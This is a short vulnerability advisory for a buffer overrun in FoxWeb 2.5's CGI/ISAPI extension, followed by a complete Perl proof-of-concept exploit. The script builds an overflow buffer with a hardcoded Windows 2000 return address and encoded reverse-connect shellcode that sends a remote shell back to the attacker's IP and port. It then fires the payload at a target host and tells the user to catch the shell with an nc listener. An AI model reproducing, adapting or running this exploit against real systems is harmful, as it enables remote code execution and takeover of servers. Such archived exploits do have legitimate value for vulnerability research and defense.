source: https://www.securityfocus.com/bid/8547/info
FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.
#!/usr/bin/perl
#
# proof of concept foxweb 2.5 (http://www.foxweb.com)
# by pokleyzz <pokleyzz@scan-associates.net>
#
# 06-27-2003
#
# usage:
# # nc -vv -l -p <local port>
# ...
# # ./bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]
#
# kau persis musang berbulu ayam ..
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $musang = "/scripts/foxweb.dll";
my $rawret = "77e127bd"; # user32.dll = 0x77e127bd win2k sp3
my $conn;
my $ret;
my $xip;
my $xport;
if ($#ARGV < 3){
print "[x] foxweb 2.5 exploit for windows \n\tby pokleyzz of d' scan clan <pokleyzz@scan-associates.net>\n\n";
print "Usage: \n bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]\n";
print "kau persis musang berbulu ayam ..\n";
exit;
}
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
if ($ARGV[4]){
$musang = $ARGV[4];
}
if ($ARGV[5]){
$rawret = $ARGV[5];
}
## start function
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
$ret .= chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
}
}
sub ip_to_shellcode {
my $sip = $_[0];
split /\./,"$sip" ;
@ar_ip = @_;
if ($#ar_ip < 3) {
die "[*] incorrect local ip ...\n ";
}
$xip = sprintf("%%%.2x%%%.2x%%%.2x%%%.2x" ,int($ar_ip[0]) ^ 0x96 ,int($ar_ip[1]) ^ 0x96 ,int($ar_ip[2]) ^ 0x96 ,int($ar_ip[3]) ^ 0x96 );
}
sub port_to_shellcode {
my $sport = int($_[0]);
if ($sport > 65535 ) {
die "[*] incorrect port number ...\n ";
}
$xport = sprintf("%%%.2x%%%.2x" ,($sport >> 0x08) ^ 0x96,($sport & 0x0000000ff) ^ 0x96);
}
## end function
# reverse connect shellcode by sk <sk@scan-associates.net>
$shellcode = ""
."%EB%02%EB%05%E8%F9%FF%FF%FF%58%83%C0%1B%8D%A0%01"
."%FC%FF%FF%83%E4%FC%8B%EC%33%C9%66%B9%5C%01%80%30"
."%96%40%E2%FA%7E%F6%96%96%96%D1%F3%E2%C6%E4%F9%F5"
."%D7%F2%F2%E4%F3%E5%E5%96%DA%F9%F7%F2%DA%FF%F4%E4"
."%F7%E4%EF%D7%96%D5%E4%F3%F7%E2%F3%C6%E4%F9%F5%F3"
."%E5%E5%D7%96%D3%EE%FF%E2%C6%E4%F9%F5%F3%E5%E5%96"
."%E1%E5%A4%C9%A5%A4%96%C1%C5%D7%C5%E2%F7%E4%E2%E3"
."%E6%96%C1%C5%D7%C5%F9%F5%FD%F3%E2%D7%96%F5%F9%F8"
."%F8%F3%F5%E2%96%F5%FB%F2%96%CC%C4%2D%96%96%66%E1"
."%17%AD%DB%CC%06%96%E2%95%DD%7D%63%1D%E5%AA%95%65"
."%1D%E0%EE%95%65%1D%E8%B6%95%6D%1D%D8%82%C0%A5%56"
."%C1%C7%1D%A9%95%6D%1D%64%A5%5F%27%98%65%30%CF%C9"
."%E2%90%15%51%92%D6%74%7E%C8%1D%C0%B2%95%45%47%76"
."%95%54%A5%5F%F0%1D%9E%1D%D0%8A%95%55%57%77%94%95"
."%57%1D%86%95%45%C8%1D%68%A5%5F%27%95%7E%EA%96%96"
."%96%15%50%9A%C4%C0%69%C1%62%CC%1D%4E%A5%5F%27%95"
."%7E%FE%96%96%96%15%50%9E%C3%FE%97%97%96%96%69%C1"
."%62%A5%56%C6%C6%C6%C6%D6%C6%D6%C6%69%C1%6E%1D%4E"
."%F0%51%D3%96%94%96%F0%51%D3%94"
."PORT" # 2 char
."%51%D3%92"
."IP" # 4 char
."%FC%86%C3%C5%69%C1%6A%A5%5F%27%87%C1%1D"
."%6B%65%3D%C9%50%D3%96%D2%1F%CB%AA%1F%CB%AE%1F%CB"
."%D6%F0%51%D3%BA%97%97%1B%D3%D2%C6%C3%C7%C7%C7%D7"
."%C7%DF%C7%C7%C0%C7%69%C1%7A%C6%69%C1%66%1C%90%D0"
."%12%56%E3%6F%C7%C4%C0%C5%69%44%CC%CF%3D%74%78%55";
# port c6 96 = 0x5000 ^ 0x9696
# 96 c6
# ip BF 97 3E 56 = 192.168.1.41 ^ 0x96969696
# 56 3E 97 BF
# 127.0.0.1 = 7f000001
#$xip = "%56%3E%96%82"; # 192.168.0.20
&ip_to_shellcode($myip);
&port_to_shellcode($myport);
#$xip = "%82%96%";
#$xport = "%07%06"; #9090
$shellcode =~ s/IP/$xip/;
$shellcode =~ s/PORT/$xport/;
&string_to_ret($rawret);
$buffer .= "A" x 1671;
$buffer .= "\xeb\x0c\xeb\x0c"; # jmp short 0x0c
$buffer .= $ret;
$buffer .= "B" x 16;
$buffer .= $shellcode;
$request = ""
."GET $musang/$buffer HTTP/1.1\n"
."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
."Host: $host:$port\n"
."Connection: Close\n\n";
print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
print "[x] Sending exploit code ...\n";
print $conn $request;
print "[x] Exploit sent .. good luck :) ...\n";
#print $request;